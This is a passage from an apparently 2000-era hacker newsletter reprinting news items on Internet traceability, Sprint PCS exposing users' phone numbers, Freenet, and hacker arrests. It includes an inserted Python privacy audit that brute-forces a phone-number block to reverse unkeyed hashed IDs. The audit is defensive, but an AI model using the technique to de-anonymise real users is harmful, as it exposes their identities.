      Kong was in a position to tackle computer crime, he said.
 
      Through regular meetings with the Department of Justice,
      heavier penalties have been handed out in court cases. 
 
      "The courts have shown already that other legislation
      applies on the Internet as well," he said. "And, secondly,
      they're more than happy to give some fairly hefty
      sentences." 
      
      @HWA
      
135.0 HNN:Mar 7th:ATM and Frame Relay Vulnerable to Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acopalyse 
      The Yankee Group has said that ATM and Frame Relay
      Networks are extremely vulnerable to security breaches.
      ASPs, network carriers and other corporations will spend
      $60 and $500 million between now and 2004 to add
      encryption to their networks. 

      TechWeb 
      http://www.techweb.com/wire/story/TWB20000306S0005
      
      ATM, Frame Relay Data Networks Insecure
      
      (03/06/00, 12:07 p.m. ET) TechWeb 

      ATM and frame relay data networks are highly
      vulnerable to security breaches, researcher
      Yankee Group said Monday. ATM and
      frame-relay data network carriers, application
      service providers and hosting providers, and
      corporations will spend $60 million this year
      and up to $500 million globally in 2004 to add
      encrypting hardware and software to
      counteract transport security threats. 
      
      @HWA      
      
      Brilliant! (Do these people get paid??) - Ed
      
      
      
136.0 HNN:Mar 8th:EFF Looking For Lawyers For DeCSS Case 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The Motion Picture Association has retained the
      services of the prestigious New York law firm of
      Proskauer Rose to handle its side of the DVD DeCSS
      case. The Electronic Frontier Foundation is still
      searching for a New York based firm that will handle the
      case without breaking the bank. The EFF is attempting
      to use 'open law' as one alternative but is having little
      success. 

      Wired       
      http://www.wired.com/news/politics/0,1283,34720,00.html
      
      
      U.S. Wants to Trace Net Users
      by Declan McCullagh 

      3:00 a.m. 4.Mar.2000 PST
      WASHINGTON -- The ease of hiding one's 
      identity on the Net is giving police migraines and justifies providing 
      broad new powers to law enforcement, the White House says in a forthcoming 
      report. 

      The federal government should take steps to improve online traceability 
      and promote international cooperation to identify Internet users, 
      according to a draft of the report commissioned by President Clinton and 
      obtained by Wired News. 

      Police should be able to determine the source of hacker attacks or 
      "anonymous emails that contain bomb threats," states the 200 KB document 
      prepared by a high-level working group chaired by Attorney General Janet 
      Reno. 

      Although the report was largely complete before last month's prominent 
      denial-of-service attacks, it will likely influence the debate over how 
      the U.S. government should respond to them. 

      The FBI has not made any arrests during its investigation, and bureau 
      officials Tuesday told Congress that anonymity and the global nature of 
      the Internet pose serious problems. 

      A White House spokesman said the report is being finalized and "should be 
      released very soon." 

      The Working Group on Unlawful Conduct on the Internet, which Clinton 
      created in August 1999 to consider new laws or educational programs, 
      includes senior administration officials such as FBI Director Louis Freeh, 
      Treasury Secretary Larry Summers, Commerce Secretary William Daley, 
      and representatives from the military, DEA, and Secret Service. 

      The group focused on what it views as the problem of anonymity, citing 
      "the need for real-time tracing of Internet communications across 
      traditional jurisdictional boundaries, both domestically and 
      internationally [and] the need to track down sophisticated users who 
      commit unlawful acts on the Internet while hiding their identities," 
      according to the report. 

      Currently no laws require Internet users in the United States to reveal 
      their identities before signing up for accounts, and both fee-based and 
      free services offer anonymous mail, Web browsing, and dialup connections. 

      Internet service providers should be encouraged, though not required, to 
      maintain detailed records of what their users are doing online. "Some 
      industry members may not retain certain system data long enough to permit 
      law enforcement to identify online offenders," the report says. 

      But providing police with increased abilities to trace users raises thorny 
      legal and technical questions, and civil libertarians on Friday questioned 
      whether it would violate privacy rights protected by the Constitution. 

      A 1995 Supreme Court decision, McIntyre v. Ohio Elections Commission, 
      upheld a right to anonymous political speech.

      "This is the nutty kind of stuff that's produced by people who meet in 
      closed rooms without windows," said Marc Rotenberg, director of the 
      Electronic Privacy Information Center. 

      David Banisar, co-author of The Electronic Privacy Papers, said the 
      administration unwisely "wants to make it easier to obtain people's 
      identities, trace their movements online, and apply wiretapping to the 
      Internet." 

      The report says anonymous remailers can be used to protect the privacy of 
      dissidents in oppressive countries, but also can frustrate police who 
      can't figure out who sent the message. 

      "To be sure, individuals can generally engage in many 'real world' 
      activities relatively anonymously, such as making small cash payments and 
      attending public events. But they cannot remain anonymous in other 
      contexts, such as opening a bank account or registering a car," the 
      report says. "Indeed, many financial institutions have substantial 
      customer identification requirements." 

      Response to the proposal among House Republican leaders was cautious. 

      "We need to make sure this isn't used as an excuse to set up a big brother 
      monitoring program. 'Real-time tracing of Internet communications' sounds 
      an awful lot like a proposal to put backdoors in the latest revision of 
      the Internet protocol itself," said Richard Diamond, a spokesman for 
      House Majority Leader Dick Armey. 

      "Obviously we need to be able to track down those who would use the 
      Internet to commit crimes, just as if they had used a telephone to do the 
      same," he said. "Let's just keep things in perspective." 

      The White House report cites the PairGain case, in which a stock 
      manipulator posted a fraudulent Bloomberg article in an attempt to drive 
      the company's share prices up. 

      The report also says that Congress should consider approving a law to 
      remove some privacy protections from journalists and publishers. "With the 
      advent of the Internet and widespread computer use, almost any computer 
      can be used to 'publish' material," says the draft document, which 
      also recommends reduced privacy rights for cable modem users. 

      During a White House summit with industry leaders last month, Clinton 
      denounced the recent denial-of-service attacks but cautioned against 
      overreaction. 

      The FBI and Justice Department have long opposed untraceable Internet use. 

      "I think we are perilously close to a lose-lose situation in which 
      citizens have lost their privacy to commercial interests and criminals 
      have easy access to absolute anonymity," Justice Department prosecutor 
      Philip Reitinger said on an MIT panel last April, according to The 
      New York Times. 

      The FBI's Freeh told Congress much the same thing when he testified 
      during an appropriations hearing last year. 
      
      @HWA
      

137.0 HNN:Mar 8th:Cell Surfing Not Anonymous Either 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Wireless Internet is the hot new feature in cell phone
      technology but some companies may be violating users'
      privacy. Sprint PCS and possibly other companies embed
      users' phone numbers inside the request for every page
      viewed. Sprint says that the use of phone numbers in
      this manner is clearly spelled out in its license
      agreement. (Look at the fine print, It's Huge!) 

      SF Gate 
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/07/BU94577.DTL
      
      
      Concern Over Cell Surfing
      Sprint phone reveals number to Web sites 

      Todd Wallack, Chronicle Staff Writer 
                                              
      Tuesday, March 7, 2000 

      Kevin Manley has no problem giving his name and
      address to Web sites like Amazon.com when he
      needs to buy a book. But Manley, a Seattle software
      developer, was stunned to discover recently that his
      Sprint PCS cell telephone automatically transmits his
      phone number to every Web site he visits using
      Sprint's new wireless data service. 

      ``I was surprised,'' Manley said. ``If I'm just surfing
      the Web without purchasing something, I expect to
      remain anonymous.'' 

      Manley isn't alone. It turns out that Sprint PCS, and
      possibly some other wireless companies, routinely
      embed customers' phone numbers in Web page
      requests, raising concerns about whether these
      companies are doing enough to safeguard users'
      privacy. 

      ``People don't want to be automatically identified in
      cyberspace, any more than they want to wear
      bar-coded name tags as they walk down a city
      street,'' said Jason Catlett, president of JunkBusters,
      an anti-marketing group. 

      Privacy advocates said they worried that Web sites
      could potentially forward users' cell phone numbers
      to their sales department for follow-up calls. Or
      dot-com companies could use databases to match
      surfers' phone numbers with their name, address and
      other personal information. 

      ``Just what we all need, more telemarketers calling
      us!'' said Richard Smith, a Massachusetts
      programmer who first verified that Manley's problem
      affects other Sprint PCS customers. 

      Although relatively few customers now use cell
      phones to surf the Web, the issue could become
      increasingly important as millions of Americans take
      advantage of the technology in coming years. Sprint
      just started its service in the United States in
      September and other major carriers like Bell Atlantic
      and AirTouch Communications have since followed
      suit. AT&T has been tinkering with the technology
      for several years, though it's only recently targeted
      the mass market. 

      But Sprint PCS spokesman Tom Murphy
      downplayed the privacy fears. He pointed out that
      users routinely hand personal information to online
      retailers when they buy a book or plane ticket. Those
      Web sites can then instantly recognize users when
      they return by depositing a small file on users' hard
      drive called a ``cookie.'' 

      In addition, Sprint said it notifies customers that their
      phone numbers will be sent to Web sites in its service
      agreement, posted on its Web site. But Manley
      complained that the sentence is buried in the nearly
      6,000-word document. He said he only happened
      upon the problem while trying to figure out how the
      cell phone worked, using it to surf his own Web
      server and then analyzing Web page requests. 

      It's also possible that other phone companies'
      customers are affected by the privacy hole. 

      That's because most of Sprint's rivals use the same
      microbrowser, developed by Redwood City's
      Phone.com, which boils down Web sites so they can
      be read through a cell phone's tiny screen. 

      Because of the way the software works, Phone.com
      requires wireless companies to use a unique ID
      number for each user when they request a Web
      page. For obvious reasons, the phone number is the
      simplest to use. 

      But Ben Linder, Phone.com's marketing vice
      president, said it recommends phone companies alter
      the phone number in some way so Web sites can't
      use the number to call or identify surfers. Indeed,
      Bell Atlantic said it does just that. 

      ``We did this intentionally to provide a privacy barrier
      for our customers,'' said Bell Atlantic spokesman Jim
      Gerace. ``What you sacrifice is a little bit of speed,
      but essentially the user doesn't recognize that big a
      difference.'' 

      AirTouch Communications said it drops customers'
      phone numbers altogether, and simply passes along a
      random number to the Web site. 

      In addition to the privacy issues, AirTouch said there
      is another reason to safeguard cell phone users'
      phone numbers. Like many state-of-the-art pagers,
      cell phones with browsers are capable of receiving
      instant text messages called alerts. But if someone
      were able to obtain a list of cell phones with the
      feature, they could potentially blanket them with
      unsolicited ads, similar to junk e-mail and faxes. 

      ``By giving out someone's phone number, you open
      up the door to alert messages,'' said John Rizzo, an
      AirTouch software engineer. Though Rizzo said he
      doesn't believe spammers have started hitting cell
      phones yet, he said ``the potential is there.'' 

      AT&T declined to say whether it automatically gives
      out customers' phone numbers to the Web sites they
      browse. Spokesman Ken Woo would only say that
      ``it's not an issue'' because the company hasn't
      received any complaints. 

      But Manley, the Seattle software developer, said
      customers typically have no way to know when their
      phone numbers are transmitted to Web sites. ``The
      reason nobody (else) complains is because they don't
      realize their privacy is being violated.'' 

      Even so, Manley said he will continue to use his
      Sprint phone to surf the Web. ``It's an annoyance,''
      he said, ``but the convenience of being able to use the
      phone to browse is so much.'' 
      
      2000 San Francisco Chronicle   Page E1 
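
      The three gateway behaviours described in the article above (forwarding
      the phone number itself, altering it, or replacing it with a random
      number), as an added example that is not from the Chronicle, HNN or
      Phone.com. The header name, keys and sample number are assumptions;
      HMAC is one possible way to "alter" the number, and the optional
      per-site scoping goes beyond what the article describes.

```python
"""Subscriber-ID handling at a wireless web gateway (added example).
The header name, keys and phone numbers are constructed for illustration."""
import hashlib
import hmac
import secrets

HEADER = "X-Subscriber-Id"      # hypothetical header name (assumption)
SAMPLE_NUMBER = "2065550142"    # constructed; 555-01xx is a fictional range


def raw_id(phone):
    """Forward the phone number itself, the practice the article describes."""
    return phone


def unkeyed_hash_id(phone):
    """Naive alteration: SHA-256 of the number with no secret involved."""
    return hashlib.sha256(phone.encode()).hexdigest()[:16]


class KeyedPseudonym:
    """Alter the number with a secret held only by the gateway (HMAC-SHA256).
    The ID stays stable per subscriber, so sites can still recognise a
    returning user, but it cannot be recomputed without the key."""

    def __init__(self, key):
        self._key = key

    def __call__(self, phone, site=""):
        # Mixing in the site name gives each site a different ID for the
        # same subscriber, so two sites cannot compare notes.
        msg = (site + "|" + phone).encode()
        return hmac.new(self._key, msg, hashlib.sha256).hexdigest()[:16]


class RandomMapping:
    """Drop the number altogether: issue a random ID kept in a gateway table."""

    def __init__(self):
        self._table = {}

    def __call__(self, phone):
        if phone not in self._table:
            self._table[phone] = secrets.token_hex(8)
        return self._table[phone]


def outbound_headers(phone, transform, **kwargs):
    """Headers the gateway attaches to the request it forwards to the site."""
    return {HEADER: transform(phone, **kwargs)}


def candidate_block(prefix):
    """All 10,000 numbers sharing a six-digit area-code/exchange prefix."""
    return (f"{prefix}{n:04d}" for n in range(10000))


def recoverable(public_transform, observed_id, candidates):
    """Privacy audit: given only the ID a site received and the publicly
    known transform, return the phone number if trying candidates finds it."""
    for number in candidates:
        if public_transform(number) == observed_id:
            return number
    return None


def audit():
    """Issue an ID under each scheme, then test whether it maps back to the
    number using only what someone outside the gateway could run."""
    gateway_hmac = KeyedPseudonym(secrets.token_bytes(32))
    gateway_random = RandomMapping()
    issued = {
        "raw": raw_id(SAMPLE_NUMBER),
        "unkeyed-hash": unkeyed_hash_id(SAMPLE_NUMBER),
        "keyed-hmac": gateway_hmac(SAMPLE_NUMBER),
        "random-mapping": gateway_random(SAMPLE_NUMBER),
    }
    # Same algorithms, but without the gateway's key or its table.
    outsider = {
        "raw": raw_id,
        "unkeyed-hash": unkeyed_hash_id,
        "keyed-hmac": KeyedPseudonym(b"outsider-guess"),
        "random-mapping": RandomMapping(),
    }
    return {
        name: recoverable(outsider[name], issued[name], candidate_block("206555"))
        for name in issued
    }


if __name__ == "__main__":
    for scheme, found in audit().items():
        print(f"{scheme:15s} -> {'number recovered' if found else 'not recoverable'}")
```

      An alteration with no secret fails the audit because the space of phone
      numbers is small enough to try exhaustively; the keyed and random
      schemes pass.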
      
      @HWA
      
138.0 HNN:Mar 8th:Freenet Promises True Free Speech 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Still in beta stages a new network known as Freenet
      hopes to provide even more privacy and anonymity to
      users. Without centralized control Freenet would have
      no IP addresses or DNS making it extremely difficult to
      censor information. With no way to identify users some
      advocates feel that the network would be a haven for
      software and multimedia pirates. 

      Wired
      http://www.wired.com/news/technology/0,1282,34768,00.html
      
      Freenet       
      http://freenet.sourceforge.net
      
      Wired;
      
      Alternative Net Protects Pirates 
      by Leander Kahney 
      
      3:00 a.m. 8.Mar.2000 PST Open-source advocates are developing an alternative 
      publishing network that promises to provide true anonymity in sharing documents 
      and files over the Internet. 
      
      But in addition to protecting free speech, the new system also could be a boon 
      for multimedia pirates. 
      
      Freenet is an open-source file-transfer system similar to the Web for sharing 
      digital content such as HTML pages and MP3 music files. It will be run by 
      connected clusters of servers or node stations that could in turn be run on 
      almost any PC connected to the Internet. 
      
      But unlike the Web, Freenet has no centralized administrative infrastructure of 
      domain name servers (DNS) and IP addresses that can be used to track users. 
      Hosting and replicating documents and files requires that Freenet backers 
      volunteer their time and resources. 
      
      Because Freenet aims to be anonymous, secure, and without centralized control, 
      it would make it almost impossible to trace people who post content -- legal or 
      otherwise -- onto the network. 
      
      "My primary motivation was to make it very difficult to censor information," 
      said Ian Clarke, an Irish programmer who designed the system. "With the Internet 
      there's the potential to censor and monitor people to a degree that's never been 
      possible before. I wanted to develop the technology to make this impossible." 
      
      Clarke started work on Freenet 18 months ago as a graduate student in artificial 
      intelligence at Edinburgh University. 
      
      He had been outraged by the Australian government's proposal to introduce 
      sweeping censorship laws, which went into effect in January. 
      
      Clarke hopes to launch the first public version in the spring, but he said the 
      system is still pretty rough. The server is nearly finished, but so far there 
      are no browsers, or clients, to make the network easy to use. 
      
      Freenet software will be released under the GNU public license, which will allow 
      anyone to freely distribute and change the source code. The system is being 
      written in Java by about a dozen programmers internationally. They have never 
      met nor even spoken over the phone -- all communication is by email, Clarke 
      said. 
      
      Both authors and readers can choose to be anonymous if they so wish, Clarke 
      said. Like the Web, the network is navigated by a client, or browser. 
      
      It will even be difficult to determine if someone is running a Freenet 
      server and what information is being stored on it, Clarke said. 
      
      Alex Fowler of the Electronic Frontier Foundation said that while he generally 
      supports anti-censorship tools, Freenet could create as many problems as it 
      solves. 
      
      Fowler said that Freenet could be a useful tool in countries like Singapore or 
      China that censor the Net or quash free speech. But he doesn't like the idea 
      that you wouldn't be able to remove sensitive information -- such as someone's 
      medical records.
      
      "There's no way to tell if a project like this will actually take off," he said. 
      "It's certainly going to raise some questions with a whole lot of people. Not 
      just copyright holders, but governments too." 
      
      Patrick Ball, deputy director of the Science and Human Rights Program with the 
      American Association for the Advancement for Science, said tools like 
      anonymizers, strong cryptography, and Freenet tend not to help activists who are 
      not already under surveillance because using them is in itself suspicious and 
      tends to alert the authorities. 
      
      "I'm for any application that protects dissidents," he said. "But there's a 
      higher order problem that's very difficult to get around, and that's by using 
      these tools you draw attention to yourself." 
      
      Although Clarke designed Freenet to protect free speech, he thinks that the 
      safeguards they are building in to make it difficult to track down those who 
      distribute content could lead to its notoriety as a vehicle for copyright 
      piracy. 
      
      The system was designed to make it impossible to find out where files are 
      physically stored. Information posted to the network is stored on multiple 
      servers simultaneously, making it difficult to remove a file. 
      
      In fact, Clarke said any attempt to remove information causes it to be copied to 
      other servers on the network. 
      
      The only way to remove information is to disable the entire network, which may 
      prove difficult if it becomes popular and is running on thousands of PCs all 
      over the globe. 
      
      However, Clarke said the network cannot be guaranteed to permanently store 
      information. Only popular files survive for any period of time. Older, unpopular 
      files would be overwritten by more popular ones. 
      
      "As a project we don't want to be labeled as hackers who distribute warez or 
      copyrighted material," he said. "The purpose of Freenet is to promote freedom of 
      information, but there is an inevitable consequence there that it might lead to 
      violation of copyright law." 
      
      "The potential for protecting freedom of speech is more important than 
      protecting copyright, which is an economic tool," Clarke added. 
      
      Clarke noted that Freenet can be functionally identical to Napster, the wildly 
      popular network for sharing music online. But while the Recording Industry 
      Association of America is currently seeking a court order to shut down Napster's 
      central servers, it would be almost impossible to disable a Freenet network 
      running on machines all over the world. 
      
      "Because it's decentralized no one can be held responsible for it," Clarke said. 
      "Once it's released there's no point coming after me because there's nothing I, 
      nor anyone else, can do to shut it down."
      
      Eric Scheirer, a music technology researcher at MIT's Media Lab, said Freenet is 
      an interesting experiment, but said it would likely be used only by a small 
      community of pirates and "privacy nuts." 
      
      "If it is adopted, it will be adopted by people who want to exchange illegal 
      information and by people who are rabid about privacy and security, which is a 
      relatively small universe," Scheirer said. 
      
      Scheirer pointed out that the Web is trustworthy because of the content on 
      certain domains, and he likes the convenience of tracking devices such as 
      cookies that remember log-in names and passwords. 
      
      "Many of the advantages of Freenet are disadvantages to me," he said. 
      
      Nonetheless, Scheirer said the advent of Freenet and Gnapster, an open-source 
      clone of Napster, illustrated the need for debate about copyright laws in the 
      age of ubiquitous digital distribution channels. 
      
      "There are larger questions about the implications of these technologies," 
      Scheirer said. 

        
      @HWA
       
139.0 HNN:Mar 8th: New Bills Before Congress 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Two new bills are before congress that could have
      serious implications if passed. S2092 would get rid of
      the $5000 in damages limit before the FBI could
      investigate. It also authorizes a roving internet tap as
      well as lowering the age of an adult to 15. (Seems it
      was a problem proving any damages so let's just get rid
      of the limit! But if there are no damages shouldn't the
      crimes be treated as trespass, which is a minor
      misdemeanor? If this passes someone can report
      someone has broken into their home PC but not
      damaged anything but the FBI has jurisdiction to
      investigate countrywide with a roving internet tap. Like
      they aren't overworked enough already.)

      Federal Register - via Cryptome 
      http://cryptome.org/s2092.txt
      

      S2105 Would make it a crime to tamper with
      identification codes put in place by manufacturers.
      Disabling or changing such codes would be a crime. So
      changing a MAC address or disabling the PIII ID code
      would now be a crime. 

      Federal Register - via Cryptome        
      http://cryptome.org/s2105.txt
      
      @HWA
      
140.0 HNN:Mar 8th:Security Focus Hires Kevin Poulsen 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Aleph One 
      SecurityFocus.com announced yesterday the addition
      of Kevin Poulsen as the company's editorial director.
      Poulsen has authored a weekly column on computer
      security for ZDTV, covered tech news for ZDNN, and
      contributed freelance articles for Computer Shopper
      and Wired Magazine. Kevin is probably best known for
      his illicit forays into the telephone network which turned
      him into a fugitive who was wanted by the FBI. 

      Security Focus       
      http://www.securityfocus.com/level2/?go=announcements&id=65
      
      Tue Mar 07 2000

      SecurityFocus.com hires Kevin Poulsen as Editorial Director

      SAN MATEO, Calif.--(BUSINESS WIRE)--March 7, 2000-- 

      Poulsen opens Washington D.C. bureau as SecurityFocus.com enhances 
      position to become security industry's leading news watchdog. 

      SecurityFocus.com, the Internet's premier security information portal, 
      announced today the addition of Kevin Poulsen as the company's editorial 
      director, a newly created position. Poulsen's proven industry expertise, 
      and his reputation as a security industry insider, will further advance 
      SecurityFocus.com's reputation as a premier security information source 
      for news-breaking security industry issues and technological developments 
      worldwide. Poulsen's opening of SecurityFocus.com's new Washington D.C. 
      office will strategically place the company in the geographic center of 
      national Internet security policy, legislation, and news. "Kevin brings 
      yet another well-recognized name from the security industry to our staff," 
      said Art Wong, CEO of SecurityFocus.com. "We consider him an industry 
      luminary, especially when you consider that at one time he was one of the 
      first phone and computer hackers to ever be identified and caught. There's 
      no doubt that he brings an `insider's view' to the industry as both a 
      security professional and as a perpetrator. He has proven his journalistic 
      achievements and we expect him to push our growth as a news provider in 
      the information security space." 

      "This is an extraordinary opportunity for me to join a growing niche 
      company where I can marry my years of experience as a journalist with my 
      firsthand knowledge of all sides of the computer security world," said 
      Poulsen. "I plan to lead the charge as we push to expand 
      SecurityFocus.com's growing reputation as one of the leading security 
      information resources on the Internet today. Simply put, I expect 
      SecurityFocus.com to become the first stop for anyone hungry for accurate 
      and timely news on computer security and privacy." 

      About Kevin Poulsen 

      Poulsen brings a range of experience to his new position as editorial 
      director for SecurityFocus.com. He has maintained secure networks at SRI 
      International, a defense contractor, and worked as a network administrator 
      at Sun Microsystems. As a hacker, Poulsen's illicit forays into the 
      telephone network turned him into a fugitive from the FBI, wanted on 
      national security charges that he didn't commit, and featured twice on 
      NBC's Unsolved Mysteries. By 1996, a reformed and penitent Poulsen began 
      building a career as a journalist, authoring a weekly column on computer 
      security for ZDTV, covering tech news for ZDNN, and contributing various 
      high-tech articles to publications like Computer Shopper and Wired 
      Magazine. Poulsen was the first to report on the Y2K survivalist 
      phenomenon, and more recently broke the story for ZDNN on presidential 
      hopeful John McCain's unprecedented use of targeted ad banners in his 
      campaign strategy. 

      Keeping the Internet Secure 

      SecurityFocus.com is the most vital online community available where 
      individuals and corporations can find a range of security information from 
      the industry's leading authorities. With Internet security on the 
      forefront of the minds of eBusinesses and eConsumers alike, 
      SecurityFocus.com delivers 24x7 access to security links and resources 
      that include news, books, mailing lists, tools, products, and security 
      services. In addition, SecurityFocus.com features one of the strongest 
      security advisory collections, including the latest information on system 
      vulnerabilities and available Internet-based solutions. One of 
      SecurityFocus.com's greatest features, Bugtraq, is the industry's most 
      read online security mailing list. The company also hosts forums on 
      security-relevant topics that include Information Warfare, Microsoft 
      Security, Security Incidents, and Executive Security. These forums foster 
      discussions among security professionals and systems managers who are 
      responsible for securing various corporate resources. These forums also 
      feature security vendors and product developers who share their 
      experiences and recommendations on the latest security issues and 
      responses. 

      About SecurityFocus.com 

      San Mateo-based SecurityFocus.com is the leading online news and 
      information resource company designed to facilitate and enhance security 
      awareness from individual users to major corporations. By providing the 
      Internet's largest and most comprehensive database on security 
      intelligence, SecurityFocus.com's staff is committed to stimulating 
      discussion between vendors and users on maintaining a safe and enriching 
      Internet environment. To discover more about SecurityFocus.com, visit 
      www.securityfocus.com . 

      Note to Editors: All names are trademarks or registered trademarks and the 
      property of their respective holders. Kevin Poulsen may be reached 
      at klp@securityfocus.com

      @HWA
      
141.0 HNN:Mar 9th: Coolio Charged with Web Defacements 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Coolio (Dennis Moran) has been charged by New
      Hampshire officials with two counts of unauthorized
      access to a computer system, for defacing the web
      pages of dare.org. Dare.org is an anti-drug web site set
      up by the Los Angeles Police Department. If convicted
      Coolio could receive 15 years in prison and a $4,000 fine
      for each count. Coolio has also admitted to defacing a
      site run by the U.S. Commerce Department, and a site
      operated by RSA Security Inc. The investigations into
      those defacements are ongoing. Coolio is not considered
      a suspect in the recent DDoS attacks. 

      Digital Mass
      http://www.digitalmass.com/news/daily/03/08/hacker_arrest.html
      
      Attrition.org - Mirrors of Coolio Defacements       
      http://www.attrition.org/mirror/attrition/coolio.html


      Digital Mass;

      N.H. teen hacker 'Coolio' arrested on state hacking charges

      By Associated Press, 03/08/00 

      CONCORD, N.H. - A teen-ager who admitted hacking into several Web sites 
      was charged Wednesday afternoon with defacing an anti-drug site set up by 
      the Los Angeles Police. 

      Dennis Moran, 17, of Wolfeboro, faces two state charges of unauthorized 
      access to a computer system, the attorney general's office said. Each 
      felony is punishable by up to 15 years in prison and a $4,000 
      fine. Under New Hampshire law, Moran is considered an adult. 

      Moran surrendered at his home and was taken to the Wolfeboro police 
      station, where a bail commissioner released him on $5,000 personal 
      recognizance, said Assistant Attorney General Michael Delaney. 

      No restrictions on computer use or other special conditions were placed 
      on his bail, Delaney said. 

      The charges were filed in the Southern District Court for Carroll County, 
      Delaney said. No arraignment date has been set. 

      Moran's father, Dennis Moran, when reached by phone at work Wednesday 
      afternoon, was upset that authorities had not notified him his son had 
      been arrested. The teen-ager is the oldest of three children who 
      all live with their father. 

      "He's only 17, for crying out loud; he's not a killer or anything. I 
      don't believe this,'' he said. 

      The teen-ager was charged with hacking into DARE.com twice last November 
      and defacing it with pro-drug slogans and images, including one depicting 
      the Disney character Donald Duck with a hypodermic syringe in his 
      arm. 

      Moran, who uses the Internet name "Coolio,'' also admitted in an 
      interview with The Associated Press last week that he had hacked two 
      other sites: a U.S. Commerce Department site that outlines rules 
      for exporting chemicals that could be used to produce weapons, and a site 
      operated by RSA Security Inc., an Internet security company. 

      "Those investigations are still going on, and there may be additional 
      charges,'' said First Assistant U.S. Attorney David Vicinanzo. 

      Moran also was questioned by the FBI last month about several "denial of 
      service'' attacks on major commercial sites, including Yahoo.com and 
      E-bay.com. 

      He has denied being involved in those attacks, and no charges have been 
      filed in those cases. Although the FBI had said they were seeking someone 
      using the Internet signer "Coolio'' in those attacks, authorities 
      have also said Coolio - the name of a popular rap singer - is used by 
      many people online. 

      Delaney suggested Moran was unlikely to face charges in the denial of 
      service attacks. 

      "The focus of our investigation at this point is unrelated to distributed 
      denial of service attacks on large Internet company Web sites,'' he said. 


      
      @HWA
      
142.0 HNN:Mar 9th: Grades Altered At MIT By Student 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Twenty-two students of a biology class at the
      Massachusetts Institute of Technology had their grades
      altered by an electronic intruder. Twenty of the
      students were given lower grades while two received
      higher ones. An internal MIT investigation has revealed
      that the culprit did not attend the class but did not say
      if the person was a student at the school or not. MIT
      representatives also said that they are unsure of the
      intruder's means of access but are continuing to
      investigate. 

      Boston Globe       
      http://www.globe.com/dailyglobe2/069/metro/MIT_says_a_hacker_altered_class_grades+.shtml
      
      MIT says a hacker altered class grades 

      By David Abel, Globe Correspondent, 3/9/2000 

      CAMBRIDGE - A hacker broke into an MIT computer system and
      altered the grades of 22 students in a biology class, institute officials
      said yesterday.

      The grades of 20 of 120 students in an undergraduate cell biology class were
      lowered, while two others were given higher marks, said officials of the
      Massachusetts Institute of Technology.

      The professor and teaching assistants for the class declined to talk about the
      investigation, but an institute spokesman said officials have identified someone
      from outside the class as the culprit. The spokesman would not say whether
      the person was a student at MIT.

      The grade-tampering scandal has left students uneasy, since the professor,
      Harvey Lodish, announced there had been a cheating incident at the end of
      class last Thursday, pleading for students to come forward if they knew who
      was responsible.

      ''From the beginning, my only hope was that it was someone from outside the
      class,'' sophomore Tara Mullaney, 19, said before a section of the class met
      yesterday. ''Since then, [the professor and teaching assistants] have been
      trying to keep this low.''

      Teaching assistants noticed changes to grades on the class's first exam after
      comparing hard copies with scores recorded on the computer. Believing that
      the school's computer system is secure, professors suspect that the hacker
      filched one of their passwords, students said.

      But Lodish and the teaching assistants were tight-lipped about the breach.

      ''I will not talk with you about this,'' Lodish responded to a Globe query by
      e-mail. ''The situation is being resolved, and all discussions about this issue are
      completely confidential.''

      Ken Campbell, an institute spokesman, said that the person responsible for the
      tampering had been identified and that school officials are investigating the
      person's motive and means of access.

      Some students speculated that the hacker may have intended to set up the
      students whose grades were raised.

      ''They know who they are and why they did it,'' said Alanna Pinkerton, 19, a
      junior in the biology class. ''The professors and the teaching assistants also
      know; everything else is hearsay.''

      The two students whose grades were increased are unlikely to have left
      themselves open to cheating charges, a biology faculty member said.

      ''It just wouldn't be a sensible thing to increase your own grades,'' said Bob
      Sauer, chairman of the biology department. ''But what I've heard is it's
      something far less nefarious.''

      There have been previous incidents of cheating at MIT.

      In 1990, 78 of the 250 undergraduates in an introductory engineering course
      were found to have turned in identical computer codes on a homework
      assignment.

      Many of those students said cheating was rampant at MIT. A study a year
      later found that 83 percent of MIT students admitted to cheating on homework
      at least once during the 1991-92 school year.

      In that survey, nearly half of all students admitted stealing other people's
      phraseology, ideas, or arguments. About 40 percent said they had
      misrepresented or fudged data in a lab report or research paper, and about
      one-fifth said they had copied from another person's paper or published work
      without acknowledgment.

      Still, the consequences for cheating at MIT are grave. If the hacker
      responsible for tampering with the grades in the cell biology class is a student,
      then he or she could face expulsion, institute officials said.

      This story ran on page A01 of the Boston Globe on 3/9/2000. 
      Copyright 2000 Globe Newspaper Company. 
      
      @HWA
      
143.0 HNN:Mar 9th: Lloyd's Defacer Arrested and Released 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Simple Nomad and Lady Sharrow 
      An unidentified man has been arrested and released on
      bail for defacing the web sites of Lloyds' of London and
      Railtrack earlier this year. He has been charged under
      sections one and three of the Computer Misuse Act
      regarding unauthorized access and the modification of
      computer systems. He was arrested by officers from
      Scotland Yard's Computer Crime Unit. 

      The Register UK       
      http://www.theregister.co.uk/000308-000020.html
      
      Posted 08/03/2000 4:04pm by Tim Richardson

      Railtrack hacker arrested

      A man has been released on police bail after being arrested in connection
      with the hack attacks that paralysed the Web sites of Lloyds of London and
